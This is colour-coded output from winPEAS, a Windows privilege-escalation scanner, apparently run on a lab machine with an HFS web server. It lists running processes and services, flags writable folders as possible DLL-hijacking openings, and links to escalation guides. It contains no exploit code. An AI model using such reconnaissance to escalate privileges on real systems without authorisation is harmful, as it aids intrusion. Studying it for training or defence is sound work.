    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(4636)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    hfs(756)[[0m[1;31mC:\HFS\hfs.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [0m[1;31mPermissions: Authenticated Users [WriteData/CreateFiles][0m
    [0m[1;31mPossible DLL Hijacking folder: C:\HFS (Authenticated Users [WriteData/CreateFiles])[0m
    [1;37mCommand Line: "C:\HFS\hfs.exe" 
[1;90m   =================================================================================================[0m

    cmd(5496)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(2908)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(4200)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    dllhost(5056)[[0m[1;32mC:\Windows\system32\DllHost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: [0m[1;32mC:\Windows\system32\DllHost.exe [0m/Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
[1;90m   =================================================================================================[0m

    cmd(2036)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(4620)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(5180)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(5040)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(5468)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(5036)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(3740)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(2444)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(5028)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(2872)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(2008)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(4160)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(2920)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(5444)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(5012)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(1992)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(3800)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(4140)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(5736)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(1980)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(4708)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(3700)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(5816)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(3260)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(4120)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(2392)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(2820)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(2388)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(3680)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(2816)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(4316)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(1056)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(4536)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(1516)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(2376)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(4024)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(4528)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(4956)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(4092)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(5384)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    explorer(1504)[[0m[1;32mC:\Windows\explorer.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: [0m[1;32mC:\Windows\explorer.exe [0m
[1;90m   =================================================================================================[0m

    cmd(4520)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(2792)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(4512)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(4080)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    taskhostex(1492)[[0m[1;32mC:\Windows\system32\taskhostex.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: taskhostex.exe 
[1;90m   =================================================================================================[0m

    conhost(3644)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(4936)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(3716)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(4072)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(3640)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(4068)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(2468)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(5348)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(3192)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(4052)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(4480)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(4048)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(3184)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(4044)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(4472)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(4040)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(3176)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(156)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(6104)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(1012)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(1536)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(3164)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(4456)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(3592)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(3160)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(568)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(3584)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(4444)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(4012)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(128)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(4868)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(2280)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(4504)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(552)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(3568)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(5720)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(4648)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(3988)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(3984)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(4412)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(5272)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(4840)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(6132)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(3544)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(956)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(3972)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(3108)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    powershell(4396)[[0m[1;32mC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: powershell
[1;90m   =================================================================================================[0m

    conhost(3100)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(3096)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(4812)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(3084)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(3944)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(2648)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    winPEAS(1784)[[0m[1;31mC:\Users\Bethany\Desktop\winPEAS.exe][0m -- POwn:[0m[1:35m Bethany[0m -- isDotNet
    [0m[1;31mPermissions:[0m[1:35m Bethany[0m [AllAccess][0m
    [0m[1;31mPossible DLL Hijacking folder: C:\Users\Bethany\Desktop (Bethany [AllAccess])[0m
    [1;37mCommand Line: winPEAS.exe  
[1;90m   =================================================================================================[0m

    conhost(2212)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(3924)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(1768)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(3744)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(2192)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(3484)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(1328)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(4340)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(2180)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    cmd(3040)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(4760)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    cmd(4328)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m

    conhost(3892)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(3888)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    conhost(1732)[[0m[1;32mC:\Windows\system32\conhost.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: \??\[0m[1;32mC:\Windows\system32\conhost.exe [0m0x4
[1;90m   =================================================================================================[0m

    powershell(2592)[[0m[1;32mC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: powershell
[1;90m   =================================================================================================[0m

    cmd(3020)[[0m[1;32mC:\Windows\SysWOW64\cmd.exe][0m -- POwn:[0m[1:35m Bethany[0m
    [1;37mCommand Line: cmd.exe
[1;90m   =================================================================================================[0m



[1;36m  ========================================([0m[33mServices Information[1;36m)========================================[0m

[33m  [+] [1;32mInteresting Services -non Microsoft-[0m
[33m   [?] [1;34mCheck if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services[0m
    chdha({738C480B-AE5C-41EA-8873-774354515E62})[[0m[1;32mC:\Windows\chdha.exe[0m] - Manual - Stopped
[1;90m   =================================================================================================[0m

    ibqtfq({8F3DD79D-D278-4288-B565-A77272356637})[[0m[1;32mC:\Windows\ibqtfq.exe[0m] - Manual - Stopped
[1;90m   =================================================================================================[0m

    VGAuthService(VMware, Inc. - VMware Alias Manager and Ticket Service)[[0m[1;32m"C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"[0m] - Auto - Running
    [1;37mAlias Manager and Ticket Service
[1;90m   =================================================================================================[0m

    VMTools(VMware, Inc. - VMware Tools)[[0m[1;32m"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"[0m] - Auto - Running
    [1;37mProvides support for synchronizing objects between the host and guest operating systems.
[1;90m   =================================================================================================[0m

    VMware Physical Disk Helper Service(VMware, Inc. - VMware Physical Disk Helper Service)[[0m[1;32m"C:\Program Files\VMware\VMware Tools\vmacthlp.exe"[0m] - Auto - Running
    [1;37mEnables support for running virtual machines from a physical disk partition
[1;90m   =================================================================================================[0m


[33m  [+] [1;32mModifiable Services[0m
[33m   [?] [1;34mCheck if you can modify any service [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services[0m
[1;32m    You cannot modify any service[0m

[33m  [+] [1;32mLooking if you can modify any service registry[0m
[33m   [?] [1;34mCheck if you can modify the registry of a service [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services-registry-permissions[0m
[1;32m    [-] Looks like you cannot change the registry of any service...[0m

[33m  [+] [1;32mChecking write permissions in PATH folders (DLL Hijacking)[0m
[33m   [?] [1;34mCheck for DLL Hijacking in PATH folders [1;33mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dll-hijacking[0m
[1;32m    C:\Windows\system32[0m
[1;32m    C:\Windows[0m
[1;32m    C:\Windows\System32\Wbem[0m
[1;32m    C:\Windows\System32\WindowsPowerShell\v1.0\[0m


[1;36m  ====================================([0m[33mApplications Information[1;36m)====================================[0m

